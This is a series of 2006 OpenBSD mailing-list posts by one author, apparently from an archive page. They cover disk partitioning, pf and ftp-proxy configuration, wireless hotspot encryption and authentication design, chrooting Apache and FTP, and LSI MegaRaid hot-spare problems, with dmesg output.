1.1) (INTELPremium ) cpu0 at mainbus0: apid 0 (boot processor) cpu0: apic clock running at 133 MHz cpu1 at mainbus0: apid 1 (application processor) cpu1: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz cpu1: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID mainbus0: bus 0 is type PCI mainbus0: bus 1 is type PCI mainbus0: bus 2 is type PCI mainbus0: bus 3 is type PCI mainbus0: bus 4 is type PCI mainbus0: bus 5 is type ISA ioapic0 at mainbus0: apid 2 pa 0xfec0, version 20, 24 pins pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 Intel 82955X MCH rev 0x81 ppb0 at pci0 dev 28 function 0 Intel 82801GB PCIE rev 0x01 pci1 at ppb0 bus 4 ppb1 at pci0 dev 28 function 4 Intel 82801G PCIE rev 0x01 pci2 at ppb1 bus 3 em0 at pci2 dev 0 function 0 Intel PRO/1000MT (82573L) rev 0x00: apic 2 int 16 (irq 11), address 00:15:f2:c8:8e:10 ppb2 at pci0 dev 28 function 5 Intel 82801G PCIE rev 0x01 pci3 at ppb2 bus 2 CMD Technology SiI3132 SATA rev 0x01 at pci3 dev 0 function 0 not configured uhci0 at pci0 dev 29 function 0 Intel 82801GB USB rev 0x01: apic 2 int 20 (irq 10) usb0 at uhci0: USB revision 1.0 uhub0 at usb0 uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered uhci1 at pci0 dev 29 function 1 Intel 82801GB USB rev 0x01: apic 2 int 17 (irq 10) usb1 at uhci1: USB revision 1.0 uhub1 at usb1 uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub1: 2 ports with 2 removable, self powered uhci2 at pci0 dev 29 function 2 Intel
Re: How to mail attachments from the comand line?
On 30 Aug 2006, at 19:51, Torsten Geile wrote: mail -a file -s test recepient . would do it, but actually in my case it doesn't. I think you have to send it in base64 encoded form, with a few added headers. What's simpler would be to put it in some publicly accessible place (like a website) and send the URL to the file rather than the file itself. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: How to mail attachments from the comand line?
On 30 Aug 2006, at 20:08, Gaby Vanhegan wrote: I think you have to send it in base64 encoded form, with a few added headers. What's simpler would be to put it in some publicly accessible place (like a website) and send the URL to the file rather than the file itself. Sorry, wrong list... :) Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: OT hardware IDE RAID cards
On 16 Aug 2006, at 06:24, Theo de Raadt wrote: If you are stuck on SATA, the Areca stuff is a few weeks away from totally rocking. And it is cheap. I can see that these guys also freely provide API documentation and code: http://www.areca.com.tw/support/index/dc1120.htm Does this mean that it will be supported by bioctl soon? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: OT hardware IDE RAID cards
On 16 Aug 2006, at 15:58, Bernd Schoeller wrote: If you are stuck on SATA, the Areca stuff is a few weeks away from totally rocking. And it is cheap. Does this mean that it will be supported by bioctl soon? Is there any other way to understand Theo's comment? ;-) Huzzah for open documentation! -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: OT hardware IDE RAID cards
On 16 Aug 2006, at 15:58, Bernd Schoeller wrote: If you are stuck on SATA, the Areca stuff is a few weeks away from totally rocking. And it is cheap. I can see that these guys also freely provide API documentation and code: http://www.areca.com.tw/support/index/dc1120.htm Does this mean that it will be supported by bioctl soon? Is there any other way to understand Theo's comment? ;-) They have them at Scan in the UK: http://www.scan.co.uk/search/search.asp?criteria=arecaSubmit=Go They look quite a bit more expensive than equivalent LSI cards: http://www.scan.co.uk/search/search.asp?criteria=lsiSubmit=Go Although they don't stock a PCI-e version. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Expand /var
So, I have this disk setup: # df -h Filesystem SizeUsed Avail Capacity Mounted on /dev/sd0a 49.2G1.6G 45.2G 3%/ /dev/sd0g 181G2.0K172G 0%/backup /dev/sd0f 167G549M158G 0%/home /dev/sd0e 9.8G 12.0K9.3G 0%/tmp /dev/sd0d 49.2G5.9G 40.8G13%/var # disklabel sd0 ... 16 partitions: # sizeoffset fstype [fsize bsize cpg] a: 10485753763 4.2BSD 2048 16384 323 # Cyl 0*- 51199 b: 8388608 104857600swap # Cyl 51200 - 55295 c: 980451328 0 unused 0 0 # Cyl 0 -478735 d: 104857600 113246208 4.2BSD 2048 16384 323 # Cyl 55296 -106495 e: 20971520 218103808 4.2BSD 2048 16384 323 # Cyl 106496 -116735 f: 356515840 239075328 4.2BSD 2048 16384 323 # Cyl 116736 -290815 g: 384855782 595591168 4.2BSD 2048 16384 323 # Cyl 290816 -478733* So far, I have nothing on /backup, nothing particularly interesting on /home and /tmp is unused. I want to make /var a bit bigger, but I don't want to rebuild the entire machine from scratch, so could I: 1. Backup all data in /var, /home and / 2. Using disklabel, remove /backup, /home, /tmp, expand /var a bit, recreate /backup, /home and /tmp again 3. Use growfs to push /var up to it's new size 4. Restore the data into /home Is it really that easy to expand a partition? Have I missed something here? Is it a safer/simpler bit to wipe the disk and start again? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: time-based pf rules in crontab do not survive a reboot (naturally)?
On 15 Jul 2006, at 15:48, Soner Tari wrote: I have time-based pf rules using cron and anchors (such as to restrict HTTP access after hours). But as you can guess, they do not survive a reboot. Is there any solution? Create a script that works out what the rules should be at any given time, add it to /etc/rc.local so it's run at boot. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: Wireless card use
On 8 Jun 2006, at 09:36, Andy Hayward wrote: Edimax EW-7128G http://www.scan.co.uk/Products/ProductInfo.asp?WebProductID=152539 Can't argue with that price! Thanks! -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: Spam Complaint
On 7 Jun 2006, at 13:33, Eliza Mazur wrote: I would like to get additional information about a spam complaint that was posted by your company. Do you have a specific department that handles these sorts of inquiries, or should I send the details regarding this matter direct to this email address? I await your reply, Elizabeth Mazur I'll deal with this one. (sound of email being moved to trash) -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Wireless card use
Has anybody any good/bad experiences to report with: http://www.ebuyer.com/UK/product/50127 Netgear WG311 Wireless PCI card The reviews seem to rate them, it's listed as supported hardware and it's less than #30. Any reason I shouldn't get one of these to go with a 3.9 box? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: AP Encryption
On 6 Jun 2006, at 09:40, Stuart Henderson wrote: You'd be sniffing encrypted traffic at that point, right? Not if you poison ARP, since the traffic will be directed to your MAC address and the AP will send it encrypted with your key. It's just an ethernet-type network, remember. (You can do the same thing with bridged VPNs, too). Isn't there a pre-shared key used as an IV of some sort in WEP (and therefore WPA)? Yes, the traffic will be coming to you, but it's on a wireless network, so you can sniff if passively if you want, you don't need an IP address for that. Is there no way to defend against ARP poisoning? If not, then this a good argument for encrypting the data at higher layers, rather than relying on link layer security. If you've been keeping an eye on what Reyk's been doing you might have noticed his description of scalable networks (http://www.openbsd.org/papers/bsdcan06-wlan/slide_12.html) with each client in its own /30 - this is not only useful for dynamic routing, it also ensures no free IP address for the ARP tricks involved. Is there video/audio of that presentation? I would be interested to hear the whole thing. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: AP Encryption
On 6 Jun 2006, at 17:12, Spruell, Darren-Perot wrote: My understanding is that the key shared by the WLAN nodes in WPA- PSK is used to generate session keys, which are then cycled on a frequent basis (by TKIP, if configured on WPA1) or another method that escapes me on WPA2 (802.11i). You arp spoof and you can have traffic directed to you, but it's encrypted using a symmetric session key which you don't have. This was my understanding of the situation. The traffic comes to you in encrypted form (you get it anyway as wireless is a broadcast media) but the rotating keys make it hard to crack the encryption before the key changes. I suppose you could steal a connection if you sniffed the initial handshake from the client. However, the initial password will be readily available. I'm not totally up to speed on WPA but does this make the connection more easily crackable? The biggest weakness pointed out thusfar in WPA to my knowledge has been in response to weak passphrases used for PSKs and dictionary attacks against them. No fear, a strong password would be used, along the lines of random numbers and letters, upper and lowercase. I would challenge that by intercepting WPA-protected traffic you can obtain cleartext so simply. Based on what I've read, I would agree with this. I would also argue that most casual wifi crackers are lazy, and will be more likely to go for the unsecured AP down the road, rather than the guy who's using WPA/TKIP, even if it is technically crackable. This does mean that I'll need to use FreeBSD if I want to do it all in one box. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: AP Encryption
On 6 Jun 2006, at 19:37, Spruell, Darren-Perot wrote: I understand. You're not saying anything regarding intercepting an existing session and accessing the data; it's akin to getting an Ethernet cable on a LAN (since you have the PSK for authentication) and negotiating a new communication session (key, etc.) with the AP. So at that point, you're effectively on the LAN, so have access to the traffic that runs across it anyway. However, if the sessions are individually keyed for each user, with a time-dependant rotating key, the person spoofing the MAC won't have the corresponding key, so won't be able to decode the traffic properly? It's similar to being on the same switch, but the radio traffic that is visible is WPA encrypted, again with the time dependant keys. So even if the PSK is freely available, the initial session negotiation means it's still hard to steal another person's traffic? Or am I getting my layers mixed up here? A problem which WPA Enterprise (w/RADIUS and individual per-user authentication, not per-computer authentication) would protect against. Unfortunately, something that wouldn't suit the OP's situation either... Yes, it requires a RADIUS client to connect. I have read a little more about RADIUS (specifically FreeRADIUS) and I like the features it has to offer, especially the accounting parts. It's a shame it's not suitable, it takes care of a lot of the problems I have yet to work out. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
AP Encryption
Hi, What are my options for encrypting wireless traffic between client and access point, where the access point is an OpenBSD box with a supported wireless card? Does it just depend on what encryption methods the card supports? I'm not that bothered about people getting onto the network, as I'm giving the password away to all and sundry. I'm more concerned with stopping people sniffing other wireless traffic. I guess IPSec would be a good step forward but I want to make it as simple as possible for clients to connect: Wireless Client --- (Insert encryption here) --- OpenBSD/AP/pf --- ADSL --- Internet WEP is pretty much out, WPA isn't supported, IPSec is probably too complicated for the general public to get going, and that's about it. If I can't do it in OpenBSD, I may have to use a separate access point, but I'd rather keep it all in one box. Any suggestions here? Many thanks, Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: AP Encryption
On 5 Jun 2006, at 21:14, Spruell, Darren-Perot wrote: From: [EMAIL PROTECTED] WEP is pretty much out, WPA isn't supported, IPSec is probably too complicated for the general public to get going, and that's about it. If I can't do it in OpenBSD, I may have to use a separate access point, but I'd rather keep it all in one box. OpenVPN is a fairly good choice for this. Strong crypto options, very minimalistic configurations can be used on both the client and server side of things, support for address pools, X.509 certificate authentication or static keys, works with NAT, and clients avaiable for popular platforms. Although a VPN is a possibility, I'm thinking more along the lines of a wireless hotspot than an extended network. I want to make it as plain and simple as possible for punters to walk in off the street and get internet access. No client downloads, no convoluted key setup process, just walk in, put the password in and go. I kind of want an excuse for this: http://www.flickr.com/photos/[EMAIL PROTECTED]/146733948/in/ set-72057594135255982/ I may have to settle for some token protection method, such as WPA, purely for the purposes of simplicity. Alternatively use a separate AP that supports WPA2 and a bunch of other protocols, and not bother trying to do it all in OpenBSD. Terms and conditions apply, your data is never totally secure, etc, etc. Shame really, one box would be better than two. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: AP Encryption
On 5 Jun 2006, at 23:05, Spruell, Darren-Perot wrote: Recent FreeBSD has WPA(2?) support or you could pick up a $50 WAP to provide it too. Don't know if there's anything with good security and good ease-of-client-setup outside of that... It's always the trade-off between ease of use and security. More of one usually means less of another, and vice versa. It looks like FreeBSD sort of do WPA with wpa_supplicant, and combine that with hostap, it could do. One way or another, the system requires some wireless kit, so it's a case of spend ages hunting for a PCI card that works with OpenBSD or FreeBSD, or just spend #10 more and get an AP that does it all anyway. On 5 Jun 2006, at 23:40, Stuart Henderson wrote: Although a VPN is a possibility, I'm thinking more along the lines of a wireless hotspot than an extended network. Turn off encryption unless you want to give a false impression of security. WPA is still subject to ARP poisoning attacks from users on the network. If somebody is determined to get in, they will. If they want to cock about with the network too, there's little I can actually do to stop that. I just want to make some sort of effort. I think the way forward is to go with the strongest encryption that just a password can give, and tell users to make use of some stronger means of security, along with some basic information. Not too much though, don't want to scare them off... Walk around the average town for half an hour with a z/laptop running kismet and see just how many people worked out how to set up encryption on their own networks... Surely this works in my favour? Because there's such a plethora of easy targets, any target putting up a better than average defence (but by no means uncrackable), they'll go for the softer target. I would. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: MAC - IP - MAC
On 4 Jun 2006, at 15:55, Nick Guenther wrote: Being more restrictive will just end up being a pain. For example, maybe two friends want to share a connection, so the first gets on and then after a bit passes it off to the second who changes their IP and MAC to match, but then bam, they can't get on. Or maybe someone dualboots. I don't know as I've never tried it, but what happens on a network when the same MAC address appears for two devices? The principal is one login = one person at a time. If they dualboot, once they've booted into another OS, either the dhcp server will give them the same address they had last time, or if their MAC is different they'll get a new IP, and will just have to login again to get access. If two people want to share, they can't, unless they have two separate accounts, or are willing to indulge in internet connection sharing. Most of this stuff is beyond the casual user anyhow, which is the intended audience. There's a limit to how many layers of protection I can build in, but I think this is probably far enough. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: MAC - IP - MAC
On 3 Jun 2006, at 17:03, Clint M. Sand wrote: So all I have to do is *TRY* to login as you on another machine and your original legit connection is dropped? Think about this. Only successful logins would update the IP associated with that login. Failed login attempts would do nothing. Sorry, my wording was a little unclear, what I actually meant was a successful login from a second machine would kick the first login off, as the most recent IP would be the one associated with that client. If the first client successfully logged in again, that would kick the second login off. The best I can do against somebody trying to use a stale IP is to check the MAC address that the successful login came from against what it claims to be at the time. Any mis-match and the IP is kicked off. If people want to go to the effort of spoofing a MAC address and finding a stale IP to use, there's little I can do. Being that this is a service intended for the general public, I'm reckoning that 99.9% of users won't even know that a MAC could be spoofed, or know how to do it. I suppose I could take it one step further and get a tcp OS fingerprint of the client at login time, and use that as a further aid to checking that the person that logged in is the person currently using this IP address. Is there any way to protect against this? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
MAC - IP - MAC
Hello, good evening and welcome. I'm building a system that allows wireless clients to connect to an AP, authenticate themselves with a login and password, and they're then granted access to the internet, through a pf firewall using tables to control access. The clients are all assigned an address through DHCP (hopefully using dhcpd) so they should have an entry in dhcpd.leases for their MAC. When they authenticate, their MAC address is what is used to identify them, not their IP. I'm using a custom system to authenticate users, authpf is not really suitable here. Authenticated MACs are converted to an IP address, using dhcpd.leases to do the lookup. Then, as a double check, it will use the ARP cache to confirm that the IP and the MAC match up, so users can't steal access from a stale IP somewhere. If a user picks a static IP, they won't have an entry in dhcpd.leases, so they won't get access. What I'm looking for is a simple way to pull an IP/MAC combination out of a dhcpd.leases file, or a reasonably sized dhcpd.leases file that I can test a parser on. Can anybody help out here? Also, does this system sound reasonable or sensible? All comments welcome. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: MAC - IP - MAC
On 2 Jun 2006, at 23:16, Spruell, Darren-Perot wrote: Neither reasonable nor sensible from a security standpoint. Authenticating based on MAC addresses is like authenticating someone on the pretense of them wearing a blue shirt. It's not a strong authenenticator and it can be changed easily. It's more of an identifier. I'm trying to use it to only allow one client per login/password, and I just figured MAC addresses would be more unique than an IP and easier to track between different sites. The login and password is still independent of the IP address. From thinking about it more, it's just simpler to track which IP address belongs to which login, and then when that user tries to login on a second client, the first one is barred access. This only allows one IP address per client. It does mean that the the IP tracking software needs to know a little more about the IP address that it created, and requires to be a bit more actively managed. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: pftpx
On 25 May 2006, at 21:35, Peter Fraser wrote: The nice thing about pftpx -- it is symmetrical Yes, hence my question, and happiness that it replaced ftp-proxy. Where are I going wrong here? (pf rules and config to be found below). On 25 May 2006, at 21:42, Spruell, Darren-Perot wrote: I wonder if the -R option to ftp-proxy(8) is of help to you? I have tried this, with no success. It gets me no further than described below. On 26 May 2006, at 07:35, Camiel Dobbelaar wrote: You have to run two instances of the proxy. One as normal that listens on the default port 8021 that your internal clients can use. And another one that you will force to one server. Outbound FTP access is not a problem, it's only inbound that I need to provide access for. The problem is that it looks like ftp-proxy isn't putting the rules in to allow the incoming data connections. When I ftp from home (the username in question is in /etc/ftpchroot): 331 Password required for gaby. Password: 230 User gaby logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp ls 229 Entering Extended Passive Mode (|||56060|) 435 Can't build data connection: No such file or directory. ftp And I see in the debug log of ftp-proxy (running ftp-proxy -d -D6): #1 FTP session 1/100 started: client my.ip to server my.ip via proxy my.ip #1 passive: client to server port 56777 via port 56060 When I type the ls command. my.ip is the same in each case, the firewall, proxy and ftp server are running on the same machine. My aim here is to not open a load of ports for ftpd, but to have the pftpx part of ftp-proxy only open the ports on demand. Here's me entire pf ruleset, so I'm not doing anything fancy here: ext_if=em0 ext_ipmy.ip scrub in nat-anchor ftp-proxy/* rdr-anchor ftp-proxy/* rdr pass on $ext_if proto tcp from any to $ext_ip port 21 - 127.0.0.1 port 8021 anchor ftp-proxy/* block in on $ext_if pass in on $ext_if proto tcp to ($ext_if) port ssh keep state pass in on $ext_if proto udp to ($ext_if) port domain keep state pass out keep state And for the purposes of testing I run: ftp-proxy -d -D6 It parses fine for the moment, but I can't use FTP through it. I was really hoping pftpx would do the job, but it's just not having it. Any suggestions? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: pftpx
On 26 May 2006, at 11:31, Camiel Dobbelaar wrote: Ah right, running the proxy and server on the same machine is not supported. I see. What about running them on separate IP addresses (both still on the same machine)? Or do they need to be on different physical interfaces? Should I use a separate package, such as ftpsesame? Is there any way round this problem? I'm curious though, what prevents them from being run on the same machine? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
pftpx
Hi, The last mention of this on misc@ was march, and not much prior to that. Does anybody have any good/bad experiences with pftpx? I plan to use it to proxy incoming FTP connections, the opposite of what I'd use ftp-proxy for... Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: pftpx
On 25 May 2006, at 20:49, Ray Lai wrote: On Thu, May 25, 2006 at 08:28:12PM +0100, Gaby vanhegan wrote: The last mention of this on misc@ was march, and not much prior to that. Does anybody have any good/bad experiences with pftpx? I plan to use it to proxy incoming FTP connections, the opposite of what I'd use ftp-proxy for... It's been imported as the new ftp-proxy: http://marc.theaimsgroup.com/?m=111708277030478 This is good news. However, I can't get the configuration correct to allow me to put an FTP server behind a PF firewall, and allow inbound client connections. The documentation says that ftp-proxy is for the opposite, ftp clients behind a firewall accessing ftp servers in the outside world. Is there a working pf.conf that anyone can share with me? I can connect to the server but PASV mode fails with the normal error that it can't make the data connection. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: PHP vs Mason vs Ruby vs JSP/Tomcat
On 23 May 2006, at 22:10, L. V. Lammert wrote: Being interpreted is certainly part of the problem. Quickly compiled languages like python, perl and pike are significantly faster, while still being very dynamic and flexible. RoR uses fastcgi, .. which is just as fast as Perl or Python. It also has two modes, development and production. Development mode reloads everything, every time, so it picks up any changes you make to the code. Production mode caches as much as possible, and runs a lot faster than development mode. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: New server
On 20 May 2006, at 00:44, Stuart Henderson wrote: move the files under /var/www, and nfs mount to 127.0.0.1 back into the homes? you probably want to look at amd for this. of course the ftpd could sit on another machine if you want. This means that I'd need an nfs mount point for each website running on that machine (a lot more than 80), and also requiring the use of nfs. moving the whole homes under /var/www is simpler and presumably more robust, of course... and hey, it's only 80. Which defeats the object of what I'm trying to achieve; user's websites (and only their websites) are inside the apache chroot, so in the event of a php or apache exploit, only their websites are exposed, not their entire home directory or Maildir. Something's got to give here. I suspect that I'm going to have to un- chroot the ftp daemon. Is there an ftpd somewhere that can prevent users from looking at certain directories? For example, I would like to limit access only to /home/username and /var/www/home/username in ftpd, and prevent access to places like /etc, /usr/local, and so on. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
LSI MegaRaid non-hotspare
Hi, As mentioned before, I have a new server with the LSI MegaRaid SATA150-4 card. All works nicely at the moment, bar a slight problem with hot-spares. We configured a RAID-5 array with three 250Gb drives and one hot spare. We simulated a failure by yanking the cable out from drive 2, and the alarm went off, bioctl allowed us to silence it, and showed that the array was rebuilding, onto disk 3. The rebuild process took about 9 hours (64bit card in a 32bit slot). We put the drive back in, and bioctl showed the drive as Unused. So we try to promote that drive back to a hot spare, but the bioctl command: # bioctl -H 0:2.0 ami0 Seems to return nothing, nor does it make the change. We tried rebooting, but there's no change, and the command still does the same. When we boot into the MegaRaid config utility on the card's BIOS, it shows the drive as a hot spare, whereas bioctl still reports it as unused. # bioctl -Dhiv ami0 bioctl: cookie = 0xd2882ca0 bio_inq Volume Status Size Device ami0 0 Online 468G sd0 RAID5 0 Online 234G 0:0.0 noencl Maxtor 6V250F0 VA11 'V5075JFG' 1 Online 234G 0:1.0 noencl Maxtor 6V250F0 VA11 'V5075JVG' 2 Online 234G 0:3.0 noencl Maxtor 6V250F0 VA11 'V5064EEG' ami0 1 Unused 234G 0:2.0 noencl Maxtor 6V250F0 VA11 'V5075LQG' # bioctl -Dhiv -H 0:2.0 ami0 bioctl: cookie = 0xd2882ca0 bio_inq Volume Status Size Device ami0 0 Online 468G sd0 RAID5 0 Online 234G 0:0.0 noencl Maxtor 6V250F0 VA11 'V5075JFG' 1 Online 234G 0:1.0 noencl Maxtor 6V250F0 VA11 'V5075JVG' 2 Online 234G 0:3.0 noencl Maxtor 6V250F0 VA11 'V5064EEG' ami0 1 Unused 234G 0:2.0 noencl Maxtor 6V250F0 VA11 'V5075LQG' Any suggestions? In order to get the kernel to boot we had to disable pcibios using config, which we did on a copy of bsd.mp. We took a backup of the fresh bsd.mp. Here's a dmesg: OpenBSD 3.9 (GENERIC.MP) #598: Thu Mar 2 02:37:06 MST 2006 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP cpu0: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID real mem = 2146541568 (2096232K) avail mem = 1952505856 (1906744K) using 4278 buffers containing 107429888 bytes (104912K) of memory mainbus0 (root) bios0 at mainbus0: AT/286+(00) BIOS, date 10/30/05, BIOS32 rev. 0 @ 0xf0010 apm0 at bios0: Power Management spec V1.2 apm0: AC on, battery charge unknown apm0: flags 30102 dobusy 0 doidle 1 pcibios at bios0 function 0x1a not configured bios0: ROM list: 0xc/0x8000 0xc8000/0x2200 mainbus0: Intel MP Specification (Version 1.1) (INTELPremium ) cpu0 at mainbus0: apid 0 (boot processor) cpu0: apic clock running at 133 MHz cpu1 at mainbus0: apid 1 (application processor) cpu1: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz cpu1: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID mainbus0: bus 0 is type PCI mainbus0: bus 1 is type PCI mainbus0: bus 2 is type PCI mainbus0: bus 3 is type PCI mainbus0: bus 4 is type PCI mainbus0: bus 5 is type ISA ioapic0 at mainbus0: apid 2 pa 0xfec0, version 20, 24 pins pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 Intel 82955X MCH rev 0x81 ppb0 at pci0 dev 28 function 0 Intel 82801GB PCIE rev 0x01 pci1 at ppb0 bus 4 ppb1 at pci0 dev 28 function 4 Intel 82801G PCIE rev 0x01 pci2 at ppb1 bus 3 em0 at pci2 dev 0 function 0 Intel PRO/1000MT (82573L) rev 0x00: apic 2 int 16 (irq 11), address 00:15:f2:c8:8e:10 ppb2 at pci0 dev 28 function 5 Intel 82801G PCIE rev 0x01 pci3 at ppb2 bus 2 CMD Technology SiI3132 SATA rev 0x01 at pci3 dev 0 function 0 not configured uhci0 at pci0 dev 29 function 0 Intel 82801GB USB rev 0x01: apic 2 int 20 (irq 10) usb0 at uhci0: USB revision 1.0 uhub0 at usb0 uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered uhci1 at pci0 dev 29 function 1 Intel 82801GB USB rev 0x01: apic 2 int 17 (irq 10) usb1 at uhci1: USB revision 1.0 uhub1 at usb1 uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub1: 2 ports with 2 removable, self powered
Re: New server
On 20 May 2006, at 15:15, Joachim Schipper wrote: Something's got to give here. I suspect that I'm going to have to un- chroot the ftp daemon. Is there an ftpd somewhere that can prevent users from looking at certain directories? For example, I would like to limit access only to /home/username and /var/www/home/username in ftpd, and prevent access to places like /etc, /usr/local, and so on. A lot of FTP daemons can do that, but I don't really see the point. The protections they offer might or might not be circumventable, but nothing interesting should be readable anyway. If the ftpd runs as the UID of the person that's logged in, they won't be able to access the files they don't own anyway (contents of / etc, and others). But if possible, I'd just like to hide them from view, so they can't even be read. For example, # ls -lFa /etc | grep passwd -rw--- 1 root wheel 2688 May 19 21:57 master.passwd -rw-r--r-- 1 root wheel 2235 May 19 21:57 passwd Would still result in somebody with FTP access being able to download a list of users on the system. I would like to prevent them from doing that if possible. Anyway, ISTR that ProFTPd could do that; I'm quite certain neither stock ftpd nor vsftpd can. I hear that the security record of ProFTPd is not stellar, to say the least. I'm fairly sure that the stock ftpd can't, and I can't find anything in pure-ftpd about it either. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: LSI MegaRaid non-hotspare
On 20 May 2006, at 16:28, Marco Peereboom wrote: I fixed this in current. You can simply just upgrade the ami files to -current and build a 3.9 that is mostly RELEASE. Was it a functional problem or just a cosmetic one? If I leave it as it is, is it going to cause any real problems for me? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: New server
On 20 May 2006, at 17:56, Pancho Cole wrote: I use Pro FTP to chroot users to their home directories. see http://www.proftpd.org/ Yes, but the point is they also need to access another directory, owned by them, but well outside of that chroot, all under one login. Not using pro-ftpd, I can't allow ftp access in a chroot to all the files a user needs. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
New server
Hi, I have a new server (2.66Ghz Core Duo) with a spangly new LSI MegaRaid card (disable pcibios made it boot happily using bsd.mp), and once we'd found the broken stick of RAM everything's happy (dmesg at end) I have a systems question, relating to apache. I would like to run apache chrooted, but users need access to their both home directories in /home, and their web directory in /var/www/home/wherever. Ideally I'd like to do this under one login per user, but I can't think how to setup the system so they can access /home, and their chrooted area with one account. I don't want to put the entire /home partition into the chroot, that leaves everybody's files vulnerable if apache/php gets haxored. I could just keep each users websites folder in the chroot, but then sftpd or ftpd (both chrooted) won't be able to see them either. I can't think of a way round this, to have chrooted access, with files in separate locations, accessible under one login. Does anybody have any suggestions? Many thanks, Gaby And as promised, a dmesg from my new system: OpenBSD 3.9 (GENERIC.MP) #598: Thu Mar 2 02:37:06 MST 2006 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP cpu0: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID real mem = 2146541568 (2096232K) avail mem = 1952505856 (1906744K) using 4278 buffers containing 107429888 bytes (104912K) of memory mainbus0 (root) bios0 at mainbus0: AT/286+(00) BIOS, date 10/30/05, BIOS32 rev. 0 @ 0xf0010 apm0 at bios0: Power Management spec V1.2 apm0: AC on, battery charge unknown apm0: flags 30102 dobusy 0 doidle 1 pcibios at bios0 function 0x1a not configured bios0: ROM list: 0xc/0x8000 0xc8000/0x2200 mainbus0: Intel MP Specification (Version 1.1) 